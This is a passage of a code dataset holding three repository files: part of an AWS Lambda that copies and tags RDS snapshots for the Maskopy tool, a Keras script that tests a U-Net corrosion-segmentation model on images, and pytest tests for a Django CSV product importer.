rds_client = assume_role_session.client('rds')\n\n snapshots_created = []\n application_name = event[\"ApplicationName\"]\n cost_center = event[\"CostCenter\"]\n snapshot_identifier = event['CheckInputs']['firstSnapshotIdentifier']\n engine = event['Engine']\n # Get original snapshot_tags to append to cloned snapshot\n snapshot_tags = [\n {'Key': 'ApplicationName', 'Value': 'MASKOPY'},\n {'Key': 'Cost Center', 'Value': cost_center}\n ]\n\n parameter_group = event.get('RdsParameterGroup')\n if not parameter_group:\n parameter_group = get_parameter_group(rds_client, rds_client_local, snapshot_identifier)\n # If maskopy- snapshot exists, then use already existing snapshot.\n new_snapshot_identifier = (f\"MASKOPY-{application_name}-\"\n f\"{re.sub('[^A-Za-z0-9-]+', '', snapshot_identifier)}-\"\n f\"{context.aws_request_id}\")\n new_snapshot = copy_db_snapshot(\n rds_client, snapshot_identifier,\n new_snapshot_identifier, engine['Type'],\n snapshot_tags, CUSTOM_KMS_KEY)\n if 'aurora' in engine['Type']:\n snapshots_created.append({\n 'SnapshotName': new_snapshot['DBClusterSnapshotIdentifier'],\n 'SnapshotARN': new_snapshot['DBClusterSnapshotArn'],\n 'InstanceIdentifier': new_snapshot['DBClusterIdentifier'],\n 'Tags': snapshot_tags,\n 'RdsParameterGroup': parameter_group,\n 'Engine':engine['Type'],\n 'EngineVersion':engine['Version']\n })\n else:\n snapshots_created.append({\n 'SnapshotName': new_snapshot['DBSnapshotIdentifier'],\n 'SnapshotARN': new_snapshot['DBSnapshotArn'],\n 'InstanceIdentifier': new_snapshot['DBInstanceIdentifier'],\n 'Tags': snapshot_tags,\n 'RdsParameterGroup': parameter_group,\n 'Engine': engine['Type'],\n 'EngineVersion':engine['Version']\n })\n\n return snapshots_created\n\ndef check_snapshot_exists(rds_client, snapshot_identifier, engine):\n \"\"\"Function to check if a snapshot exists.\n Args:\n rds_client (Client): AWS RDS Client object.\n snapshot_identifier (str): The snapshot identifier to check.\n Returns:\n :obj:`dict` of str:str: Snapshot dictionary from AWS boto3 call\n if snapshot exists in session, False otherwise.\n Raises:\n MaskopyThrottlingException: Exception used to catch throttling from AWS.\n Used to implement a back off strategy.\n \"\"\"\n if \"aurora\" in engine:\n return check_snapshot_exists_cluster(rds_client, snapshot_identifier)\n else:\n return check_snapshot_exists_instance(rds_client, snapshot_identifier)\ndef check_snapshot_exists_cluster(rds_client, snapshot_identifier):\n \"\"\"Function to check if a snapshot exists.\n Args:\n rds_client (Client): AWS RDS Client object.\n snapshot_identifier 
(str): The snapshot identifier to check.\n    Returns:\n        :obj:`dict` of str:str: Snapshot dictionary from AWS boto3 call\n            if snapshot exists in session, False otherwise.\n    Raises:\n        MaskopyThrottlingException: Exception used to catch throttling from AWS.\n            Used to implement a back off strategy.\n    \"\"\"\n    try:\n        print(f'Checking DB cluster snapshot with the following name: {snapshot_identifier}')\n        snapshot_response = rds_client.describe_db_cluster_snapshots(\n            DBClusterSnapshotIdentifier=snapshot_identifier)\n        return snapshot_response\n    except rds_client.exceptions.DBClusterSnapshotNotFoundFault:\n        return False\n    except ClientError as err:\n        if err.response['Error']['Code'] == 'Throttling':\n            print(\"Throttling occurring.\")\n            raise MaskopyThrottlingException(err)\n        print(f'There was a problem checking the DB cluster snapshot: {err}')\n        # Any other describe failure is treated as \"snapshot not found\" so the\n        # caller falls through to copying a fresh snapshot.\n        return False\ndef check_snapshot_exists_instance(rds_client, snapshot_identifier):\n    \"\"\"Function to check if a snapshot exists.\n    Args:\n        rds_client (Client): AWS RDS Client object.\n        snapshot_identifier (str): The snapshot identifier to check.\n    Returns:\n        :obj:`dict` of str:str: Snapshot dictionary from AWS boto3 call\n            if snapshot exists in session, False otherwise.\n    Raises:\n        MaskopyThrottlingException: Exception used to catch throttling from AWS.\n            Used to implement a back off strategy.\n    \"\"\"\n    try:\n        print(f'Checking DB snapshot with the following name: {snapshot_identifier}')\n        snapshot_response = rds_client.describe_db_snapshots(\n            DBSnapshotIdentifier=snapshot_identifier)\n        return snapshot_response\n    except rds_client.exceptions.DBSnapshotNotFoundFault:\n        return False\n    except ClientError as err:\n        if err.response['Error']['Code'] == 'Throttling':\n            print(\"Throttling occurring.\")\n            raise MaskopyThrottlingException(err)\n        print(f'There was a problem checking the DB snapshot: {err}')\n        raise\ndef copy_db_snapshot(rds_client, snapshot_identifier,\n                     new_snapshot_identifier, engine, snapshot_tags, kms_key=None):\n    \"\"\"Function to create a copy of a rds snapshot, copying tags by default.\n    Args:\n        rds_client (Client): AWS RDS Client object.\n        snapshot_identifier (str): The source snapshot identifier.\n        new_snapshot_identifier (str): The destination snapshot identifier.\n        engine (str): The RDS engine type; aurora engines use the cluster APIs.\n        snapshot_tags (dict): A dict of tags to be added to snapshot\n        kms_key (str, optional): KMS Key to encrypt snapshot.\n    Returns:\n        dict: Returns a dict of the created snapshot.\n    Raises:\n        MaskopyResourceException: Raised if resource cannot be accessed.\n    \"\"\"\n    if 'aurora' in engine:\n        return copy_db_snapshot_cluster(\n            rds_client, snapshot_identifier,\n            new_snapshot_identifier, engine,\n            snapshot_tags, kms_key)\n    else:\n        return copy_db_snapshot_instance(\n            rds_client, snapshot_identifier,\n            new_snapshot_identifier, engine,\n            snapshot_tags, kms_key)\ndef copy_db_snapshot_cluster(rds_client, source_db_snapshot_identifier,\n                             destination_db_snapshot_identifier, engine, snapshot_tags, kms_key=None):\n    \"\"\"Function to create a copy of a rds cluster snapshot, copying tags by default.\n    Args:\n        rds_client (Client): AWS RDS Client object.\n        source_db_snapshot_identifier (str): The source snapshot identifier.\n        destination_db_snapshot_identifier (str): The destination snapshot identifier.\n        snapshot_tags (dict): A dict of tags to be added to snapshot\n        kms_key (str, optional): KMS Key to encrypt snapshot.\n    Returns:\n        dict: Returns a dict of the created snapshot.\n    Raises:\n        MaskopyResourceException: Raised if resource cannot 
be accessed.\n \"\"\"\n copy_db_cluster_snapshot_parameters = {\n 'SourceDBClusterSnapshotIdentifier': source_db_snapshot_identifier,\n 'TargetDBClusterSnapshotIdentifier': destination_db_snapshot_identifier,\n 'Tags': snapshot_tags\n }\n if kms_key:\n copy_db_cluster_snapshot_parameters['KmsKeyId'] = kms_key\n try:\n print(\"Copying DB snapshot with the following parameters: \")\n print(json.dumps(copy_db_cluster_snapshot_parameters))\n destination_snapshot_response = check_snapshot_exists(\n rds_client,\n destination_db_snapshot_identifier,\n engine)\n if not destination_snapshot_response:\n copy_db_snapshot_response = rds_client.copy_db_cluster_snapshot(\n **copy_db_cluster_snapshot_parameters)\n print(f\"Successfully copied DB snapshot: {destination_db_snapshot_identifier}\")\n return copy_db_snapshot_response['DBClusterSnapshot']\n print(f'{destination_db_snapshot_identifier} already exists. Using existing snapshot.')\n return destination_snapshot_response['DBClusterSnapshots'][0]\n except ClientError as err:\n if err.response['Error']['Code'] == 'Throttling':\n print(\"Throttling occurring.\")\n raise MaskopyThrottlingException(err)\n raise MaskopyResourceException(\"Could not copy snapshot: %s\" % err)\ndef copy_db_snapshot_instance(rds_client, source_db_snapshot_identifier,\n destination_db_snapshot_identifier, engine,snapshot_tags, kms_key=None):\n \"\"\"Function to create a copy of a rds snapshot, copying tags by default.\n Args:\n rds_client (Client): AWS RDS Client object.\n source_db_snapshot_identifier (str): The source snapshot identifier.\n destination_db_snapshot_identifier (str): The destination snapshot identifier.\n snapshot_tags (dict): A dict of tags to be added to snapshot\n kms_key (str, optional): KMS Key to encrypt snapshot.\n Returns:\n :dict`: Returns a dict of the created snapshot.\n Raises:\n MaskopyResourceException: Raised if resource cannot be accessed.\n \"\"\"\n copy_db_snapshot_parameters = {\n 'SourceDBSnapshotIdentifier': source_db_snapshot_identifier,\n 'TargetDBSnapshotIdentifier': destination_db_snapshot_identifier,\n 'Tags': snapshot_tags\n }\n if kms_key:\n copy_db_snapshot_parameters['KmsKeyId'] = kms_key\n try:\n print(\"Copying DB snapshot with the following parameters: \")\n print(json.dumps(copy_db_snapshot_parameters))\n destination_snapshot_response = check_snapshot_exists(\n rds_client,\n destination_db_snapshot_identifier,engine)\n if not destination_snapshot_response:\n copy_db_snapshot_response = rds_client.copy_db_snapshot(\n **copy_db_snapshot_parameters)\n print(f\"Successfully copied DB snapshot: {destination_db_snapshot_identifier}\")\n return copy_db_snapshot_response['DBSnapshot']\n print(f'{destination_db_snapshot_identifier} already exists. 
Using existing snapshot.')\n return destination_snapshot_response['DBSnapshots'][0]\n except ClientError as err:\n if err.response['Error']['Code'] == 'Throttling':\n print(\"Throttling occurring.\")\n raise MaskopyThrottlingException(err)\n raise MaskopyResourceException(\"Could not copy snapshot: %s\" % err)\ndef get_parameter_group(rds_client, rds_client_local, snapshot_identifier):\n \"\"\"Function to get the original parameter group name of snapshot\n Args:\n rds_client (Client): AWS RDS Client object with source session.\n rds_client_local (Client): AWS RDS Client object.\n snapshot_identifier (str): The snapshot identifier.\n Returns:\n str: A parameter group attached to original RDS instance of snapshot.\n Raises:\n MaskopyThrottlingException: Exception used to catch throttling from AWS.\n Used to implement a back off strategy.\n \"\"\"\n try:\n snapshot = rds_client.describe_db_snapshots(DBSnapshotIdentifier=snapshot_identifier)\n rds_instance = rds_client.describe_db_instances(\n DBInstanceIdentifier=snapshot['DBSnapshots'][0]['DBInstanceIdentifier'])\n parameter_group = (rds_instance['DBInstances'][0]\n ['DBParameterGroups'][0]\n ['DBParameterGroupName'])\n check_valid_parameter_group(rds_client_local, parameter_group)\n return parameter_group\n except ClientError as err:\n if err.response['Error']['Code'] == 'Throttling':\n print(\"Throttling occurring.\")\n raise MaskopyThrottlingException(err)\n if err.response['Error']['Code'] == 'DBInstanceNotFound':\n print(\"Original RDS not available.\")\n print(err)\n raise Exception(\"Parameter group not provided and cannot be extrapolated.\")\ndef check_valid_parameter_group(rds_client, parameter_group_name):\n \"\"\"Function to check for valid parameter group in destination environment.\n Args:\n rds_client (Client): AWS RDS Client object.\n parameter_group_name (str): The parameter group name.\n Raises:\n MaskopyResourceNotFoundException: Exception raised if resource is not found.\n MaskopyThrottlingException: Exception used to catch throttling from AWS.\n Used to implement a back off strategy.\n \"\"\"\n try:\n if not parameter_group_name:\n raise MaskopyResourceNotFoundException(\"Please enter a valid RdsParameterGroup.\")\n print(f'Validating parameter group: {parameter_group_name}')\n if not rds_client.describe_db_parameter_groups(\n DBParameterGroupName=parameter_group_name):\n raise MaskopyResourceNotFoundException(\"Please check your RdsParameterGroup.\")\n print(f'Validated parameter group: {parameter_group_name}')\n except ClientError as err:\n if err.response['Error']['Code'] == 'Throttling':\n print(\"Throttling occurring.\")\n raise MaskopyThrottlingException(err)\n print(f'There was a problem checking the parameter group: {err}')\n raise\n \ndef create_account_session(sts_client, role_arn, request_id):\n \"\"\"Function to create and assume account role.\n Args:\n sts_client (Client): AWS STS Client object.\n role_arn (str): The arn of the role to assume a session.\n request_id (str): UUID for session to uniquely identify session name.\n Returns:\n :obj:`boto3.session.Session`:\n A session of the role to be used.\n \"\"\"\n sts_response = sts_client.assume_role(\n RoleArn=role_arn,\n RoleSessionName=request_id\n )\n\n return boto3.session.Session(\n aws_access_key_id=sts_response['Credentials']['AccessKeyId'],\n aws_secret_access_key=sts_response['Credentials']['SecretAccessKey'],\n aws_session_token=sts_response['Credentials']['SessionToken']\n )\n\nclass MaskopyThrottlingException(Exception):\n \"\"\"Exception raised 
when AWS request returns a Throttling exception.\n \"\"\"\n\nclass MaskopyResourceNotFoundException(Exception):\n \"\"\"Exception raised when IAM role or user is not able to access the\n resource since the resource does not exist.\n \"\"\"\n\nclass MaskopyResourceException(Exception):\n \"\"\"Exception raised when IAM role or user is not able to access the\n resource.\n \"\"\"\n", "repo_name": "FINRAOS/maskopy", "sub_path": "lambda/02-UseExistingSnapshot/index.py", "file_name": "index.py", "file_ext": "py", "file_size_in_byte": 15389, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 21, "dataset": "github-code", "pt": "53", "api": [{"api_name": "boto3.client", "line_number": 8, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 9, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 10, "usage_type": "attribute"}, {"api_name": "boto3.client", "line_number": 25, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 48, "usage_type": "call"}, {"api_name": "botocore.exceptions.ClientError", "line_number": 112, "usage_type": "name"}, {"api_name": "botocore.exceptions.ClientError", "line_number": 138, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 191, "usage_type": "call"}, {"api_name": "botocore.exceptions.ClientError", "line_number": 203, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 231, "usage_type": "call"}, {"api_name": "botocore.exceptions.ClientError", "line_number": 242, "usage_type": "name"}, {"api_name": "botocore.exceptions.ClientError", "line_number": 268, "usage_type": "name"}, {"api_name": "botocore.exceptions.ClientError", "line_number": 294, "usage_type": "name"}, {"api_name": "boto3.session.Session", "line_number": 316, "usage_type": "call"}, {"api_name": "boto3.session", "line_number": 316, "usage_type": "attribute"}]}
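Every `except ClientError` branch in the record above converts throttling errors into `MaskopyThrottlingException`, whose docstrings say it exists so callers can back off; the retry itself is expected to live outside this module (for example, in the state machine that drives the lambdas). A minimal in-process sketch of such a backoff strategy, using a hypothetical `with_backoff` helper that is not part of this codebase:

```python
import time

class MaskopyThrottlingException(Exception):
    """Stand-in for the exception class defined in the module above."""

def with_backoff(func, *args, max_attempts=5, base_delay=1.0, **kwargs):
    """Retry func on MaskopyThrottlingException with exponential backoff."""
    for attempt in range(max_attempts):
        try:
            return func(*args, **kwargs)
        except MaskopyThrottlingException:
            if attempt == max_attempts - 1:
                raise  # give up after the last attempt
            time.sleep(base_delay * (2 ** attempt))  # 1s, 2s, 4s, 8s, ...

# Hypothetical usage: retry the snapshot copy when AWS throttles the request
# snapshot = with_backoff(copy_db_snapshot, rds_client, src_id, dst_id,
#                         engine, snapshot_tags, kms_key)
```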
+{"seq_id": "20584354716", "text": "import numpy as np\nimport cv2\nfrom keras.preprocessing.image import img_to_array\nimport os\nfrom matplotlib import pyplot as plt\nfrom tqdm import tqdm\nfrom keras.models import load_model\n\n\nif __name__==\"__main__\":\n\n\n    image_directory = '/content/rede2_unt/dataset_corrosion_pitting/test'\n    mask_directory = '/content/rede2_unt/dataset_corrosion_pitting/test mascara'\n    folder_test_results = '/content/rede2_unt/dataset_corrosion_pitting/test_results'\n\n    image_dataset = []\n\n    path1 = image_directory\n    files=sorted(os.listdir(path1))\n    for i in tqdm(files):\n        imge=cv2.imread(path1+'/'+i,1) # change 0 to 1 for color images\n        print(i)\n        imge=np.flip(imge, axis=1)\n        image_dataset.append(img_to_array(imge))\n\n    mask_dataset = []\n\n    path2 = mask_directory\n    files=sorted(os.listdir(path2))\n    for j in tqdm(files):\n        imge2=cv2.imread(path2+'/'+j,0) # change 0 to 1 for color images\n\n        imge2=np.flip(imge2, axis=1)\n\n        mask_dataset.append(img_to_array(imge2))\n        print(j)\n\n    mask_dataset = np.array(mask_dataset)/255.\n    image_dataset = np.array(image_dataset)/255.\n\n    print(f\"image_dataset: {len(image_dataset)}\")\n    print(f\"mask_dataset: {len(mask_dataset)}\")\n\n    # from sklearn.model_selection import train_test_split\n    # IMPORTANT: test_size is the fraction that is held out as the test set\n    # e.g. test_size = 0.2 means 20% of the images go to testing, not training\n\n    # X_train, X_test, y_train, y_test = train_test_split(image_dataset, mask_dataset, test_size = 0.2, random_state = 0)\n\n    pre_trained_unet_model = load_model('custom-unetweights-8000epochs_29_09.h5', compile=False)\n    my_model = pre_trained_unet_model\n\n    # IMPORTANT: train_test_split literally holds out a % of images for testing,\n    # which is not needed in this case here\n    X_test = image_dataset\n    y_test = mask_dataset\n\n    for i, name in enumerate(files, start=0):\n\n        test_img = X_test[i]\n        ground_truth = y_test[i]\n\n        test_img_input=np.expand_dims(test_img, 0)\n        prediction = (my_model.predict(test_img_input)[0,:,:,0] > 0.5).astype(np.uint8)\n\n        plt.figure(figsize=(16, 8))\n        plt.subplot(231)\n        plt.title('Testing Image')\n        plt.imshow(test_img, cmap='gray')\n        plt.subplot(232)\n        plt.title('Testing Label')\n        plt.imshow(ground_truth[:,:,0], cmap='gray')\n        plt.subplot(233)\n        plt.title('Prediction on test image')\n        plt.imshow(prediction, cmap='gray')\n        # save the figure to the results folder\n        if not os.path.exists(folder_test_results):\n            os.makedirs(folder_test_results)\n        filename = name\n        plt.savefig(os.path.join(folder_test_results,filename))\n\n        print(name)\n        plt.show()", "repo_name": "Corrosao/rede2_unt", "sub_path": "runtest.py", "file_name": "runtest.py", "file_ext": "py", "file_size_in_byte": 2632, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.listdir", "line_number": 20, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 21, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 22, "usage_type": "call"}, {"api_name": "numpy.flip", "line_number": 24, "usage_type": "call"}, {"api_name": "keras.preprocessing.image.img_to_array", "line_number": 25, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 30, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 31, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 32, "usage_type": "call"}, {"api_name": "numpy.flip", "line_number": 34, "usage_type": "call"}, {"api_name": 
"keras.preprocessing.image.img_to_array", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 40, "usage_type": "call"}, {"api_name": "keras.models.load_model", "line_number": 51, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 64, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 65, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 67, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 67, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 68, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 68, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 69, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 69, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 70, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 70, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 71, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 71, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 72, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 72, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 73, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 73, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 74, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 74, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 75, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 75, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 76, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 76, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 78, "usage_type": "call"}, {"api_name": "os.path", "line_number": 78, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 79, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 81, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 81, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 81, "usage_type": "call"}, {"api_name": "os.path", "line_number": 81, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.show", "line_number": 84, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 84, "usage_type": "name"}]}
+{"seq_id": "41081476881", "text": "from unittest.mock import patch, MagicMock,Mock\nimport pytest\nfrom apps.importacaocsv.import_csv import ImportFromCsv\nfrom apps.loja.models import Produtos,Fabricante\nimport pandas as pd\n\n@pytest.fixture\ndef mock_dados():\n mock_data = {\n 'manufacturer': ['Lenovo', 'Samsung'],\n 'model': ['iPhone', 'Galaxy'],\n 'color': ['black', 'white'],\n 'carrier_plan_type': ['postpaid', 'prepaid'],\n 'quantity': [1, 2],\n 'price': [1000.0, 500.0]\n }\n return mock_data\n\n@pytest.fixture\ndef columns_csv():\n columns=['manufacturer','model','color','carrier_plan_type','quantity','price']\n return columns\n\n\n@pytest.mark.django_db\nclass TestImportFromCsv:\n def setup_method(self):\n mock_arquivo = MagicMock()\n mock_arquivo.name = 'valid.csv'\n self.mock_arquivo = ImportFromCsv(arquivo=mock_arquivo)\n\n def test_erros_retonar_lista(self):\n mock_funcao = self.mock_arquivo\n mock_funcao.validar_dados_necessario = Mock(return_value=False)\n \n resultado = self.mock_arquivo.erros()\n \n assert type(resultado) == list\n assert mock_funcao.validar_dados_necessario.called\n \n def test_erros_retornar_false(self):\n mock_funcao = self.mock_arquivo\n mock_funcao.validar_dados_necessario = Mock(return_value=True)\n \n resultado = self.mock_arquivo.erros()\n \n assert resultado == False\n assert mock_funcao.validar_dados_necessario.called\n \n @patch('pandas.read_csv')\n def test_pega_dataframe_valido_retorna_pands_dataframe(self,read_csv_mock,columns_csv):\n read_csv_mock.return_value = pd.DataFrame([['apple', 's9', 'azul', 'pos', '450', '55.0']], columns=columns_csv)\n\n mock_funcao = self.mock_arquivo\n mock_funcao.validar_arquivo_extensao = Mock(return_value=True)\n \n resultado = self.mock_arquivo.pega_dataframe()\n\n assert isinstance(resultado,pd.DataFrame)\n assert mock_funcao.validar_arquivo_extensao.called\n \n def test_pega_dataframe_estensao_invalido_retornar_msg_arquivo_invalido(self):\n mock_funcao = self.mock_arquivo\n mock_funcao.validar_arquivo_extensao = Mock(return_value=False)\n \n resultado = self.mock_arquivo.pega_dataframe()\n\n assert resultado == 'Arquivo invalido'\n assert mock_funcao.validar_arquivo_extensao.called\n \n @patch('pandas.read_csv')\n def test_pega_dataframe_estensao_valido_com_colunas_faltando_retornando_str(self,read_csv_mock):\n read_csv_mock.side_effect = ValueError()\n mock_funcao = self.mock_arquivo\n mock_funcao.validar_arquivo_extensao = Mock(return_value=True)\n \n resultado = self.mock_arquivo.pega_dataframe() \n\n assert isinstance(resultado, str)\n assert mock_funcao.validar_arquivo_extensao.called\n \n def test_validar_arquivo_extensao_valido_retornar_true(self):\n resultado = self.mock_arquivo.validar_arquivo_extensao()\n assert resultado == True\n \n def test_validar_arquivo_extensao_invalido_retornar_false(self):\n mock_arquivo = MagicMock()\n mock_arquivo.name = 'valid.txt'\n \n entrada = ImportFromCsv(mock_arquivo)\n resultado = entrada.validar_arquivo_extensao() \n \n assert resultado == False\n\n @pytest.mark.parametrize('dados',[\n ['apple', 's9', 'azul', 'pos', '450', '55.0']\n ])\n def test_validar_dados_necessario_arquivo_tipo_dataframe_valido_retornar_true_e_adicionando_dataframe(self,dados,columns_csv):\n mock_funcao = self.mock_arquivo\n mock_funcao.pega_dataframe = Mock(return_value=(pd.DataFrame([dados], columns=columns_csv)))\n \n resultado = self.mock_arquivo.validar_dados_necessario()\n\n assert resultado == True\n assert isinstance(self.mock_arquivo.dataframe,pd.DataFrame)\n assert 
mock_funcao.pega_dataframe.called\n\n def test_validar_dados_necessario_arquivo_invalido_retornar_false_e_adicionando_msg_error(self):\n mock_funcao = self.mock_arquivo\n mock_funcao.pega_dataframe = Mock(return_value=False)\n \n resultado = self.mock_arquivo.validar_dados_necessario()\n\n assert resultado == False\n assert len(self.mock_arquivo.error) == 1 \n assert mock_funcao.pega_dataframe.called\n\n @pytest.mark.parametrize('dados',[\n ['apple', 's9', 'azul', 'pos', 'a450', '55.0']])\n def test_validar_dados_necessario_contem_erros_retornando_false(self,dados,columns_csv):\n mock_funcao = self.mock_arquivo\n mock_funcao.pega_dataframe = Mock(return_value=pd.DataFrame([dados],columns=columns_csv))\n\n resultado = self.mock_arquivo.validar_dados_necessario()\n\n assert resultado == False\n assert len(self.mock_arquivo.error) == 2\n\n @pytest.mark.parametrize('dados',[\n ['apple', 's9', 'azul', 'pos', 'a450', '55.0']])\n def test_save_dataframe_nao_e_none_retornar_true(self,dados,columns_csv):\n dataframe = pd.DataFrame([dados],columns=columns_csv)\n mock_parametro = self.mock_arquivo\n mock_parametro.dataframe = MagicMock(return_value=dataframe)\n \n resultado = self.mock_arquivo.save()\n\n assert resultado == True\n \n def test_save_dataframe_e_none_retornar_false(self):\n resultado = self.mock_arquivo.save()\n\n assert resultado == False\n\n def test_save_fabricante_get_or_create_retorna_2_objetos_criado_e_com_a_dado_ja_criado_e_outra_com_samsung(self,mock_dados,fabricante_factory):\n fabricante = fabricante_factory.create()\n mock_parametro = self.mock_arquivo\n mock_parametro.dataframe = pd.DataFrame(data=mock_dados)\n\n self.mock_arquivo.save()\n\n assert len(Fabricante.objects.all()) == 2 \n assert Fabricante.objects.get(id=1) == fabricante\n assert Fabricante.objects.get(id=2).fabricante == 'Samsung'\n\n def test_save_produtos_filter_encontrado_retornando_so_2_banco_de_dados_e_alterando_price_e_quantidade(self,mock_dados,produto_factory):\n produto = produto_factory.create()\n\n mock_parametro = self.mock_arquivo\n mock_parametro.dataframe = pd.DataFrame(data=mock_dados)\n self.mock_arquivo.save()\n \n entrada = Produtos.objects.get(id=1)\n \n assert len(Produtos.objects.all()) == 2\n assert entrada == produto\n assert entrada.price == 1000\n assert entrada.quantity == 4\n ", "repo_name": "Duarts-D/loja-importacao_csv", "sub_path": "apps/importacaocsv/tests/test_import_csv.py", "file_name": "test_import_csv.py", "file_ext": "py", "file_size_in_byte": 6499, "program_lang": "python", "lang": "pt", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pytest.fixture", "line_number": 7, "usage_type": "attribute"}, {"api_name": "pytest.fixture", "line_number": 19, "usage_type": "attribute"}, {"api_name": "unittest.mock.MagicMock", "line_number": 28, "usage_type": "call"}, {"api_name": "apps.importacaocsv.import_csv.ImportFromCsv", "line_number": 30, "usage_type": "call"}, {"api_name": "unittest.mock.Mock", "line_number": 34, "usage_type": "call"}, {"api_name": "unittest.mock.Mock", "line_number": 43, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 52, "usage_type": "call"}, {"api_name": "unittest.mock.Mock", "line_number": 55, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 59, "usage_type": "attribute"}, {"api_name": "unittest.mock.patch", "line_number": 50, "usage_type": "call"}, {"api_name": "unittest.mock.Mock", "line_number": 64, "usage_type": "call"}, {"api_name": "unittest.mock.Mock", 
"line_number": 75, "usage_type": "call"}, {"api_name": "unittest.mock.patch", "line_number": 71, "usage_type": "call"}, {"api_name": "unittest.mock.MagicMock", "line_number": 87, "usage_type": "call"}, {"api_name": "apps.importacaocsv.import_csv.ImportFromCsv", "line_number": 90, "usage_type": "call"}, {"api_name": "unittest.mock.Mock", "line_number": 100, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 100, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 105, "usage_type": "attribute"}, {"api_name": "pytest.mark.parametrize", "line_number": 95, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 95, "usage_type": "attribute"}, {"api_name": "unittest.mock.Mock", "line_number": 110, "usage_type": "call"}, {"api_name": "unittest.mock.Mock", "line_number": 122, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 122, "usage_type": "call"}, {"api_name": "pytest.mark.parametrize", "line_number": 118, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 118, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 132, "usage_type": "call"}, {"api_name": "unittest.mock.MagicMock", "line_number": 134, "usage_type": "call"}, {"api_name": "pytest.mark.parametrize", "line_number": 129, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 129, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 148, "usage_type": "call"}, {"api_name": "apps.loja.models.Fabricante.objects.all", "line_number": 152, "usage_type": "call"}, {"api_name": "apps.loja.models.Fabricante.objects", "line_number": 152, "usage_type": "attribute"}, {"api_name": "apps.loja.models.Fabricante", "line_number": 152, "usage_type": "name"}, {"api_name": "apps.loja.models.Fabricante.objects.get", "line_number": 153, "usage_type": "call"}, {"api_name": "apps.loja.models.Fabricante.objects", "line_number": 153, "usage_type": "attribute"}, {"api_name": "apps.loja.models.Fabricante", "line_number": 153, "usage_type": "name"}, {"api_name": "apps.loja.models.Fabricante.objects.get", "line_number": 154, "usage_type": "call"}, {"api_name": "apps.loja.models.Fabricante.objects", "line_number": 154, "usage_type": "attribute"}, {"api_name": "apps.loja.models.Fabricante", "line_number": 154, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 160, "usage_type": "call"}, {"api_name": "apps.loja.models.Produtos.objects.get", "line_number": 163, "usage_type": "call"}, {"api_name": "apps.loja.models.Produtos.objects", "line_number": 163, "usage_type": "attribute"}, {"api_name": "apps.loja.models.Produtos", "line_number": 163, "usage_type": "name"}, {"api_name": "apps.loja.models.Produtos.objects.all", "line_number": 165, "usage_type": "call"}, {"api_name": "apps.loja.models.Produtos.objects", "line_number": 165, "usage_type": "attribute"}, {"api_name": "apps.loja.models.Produtos", "line_number": 165, "usage_type": "name"}, {"api_name": "pytest.mark", "line_number": 25, "usage_type": "attribute"}]}
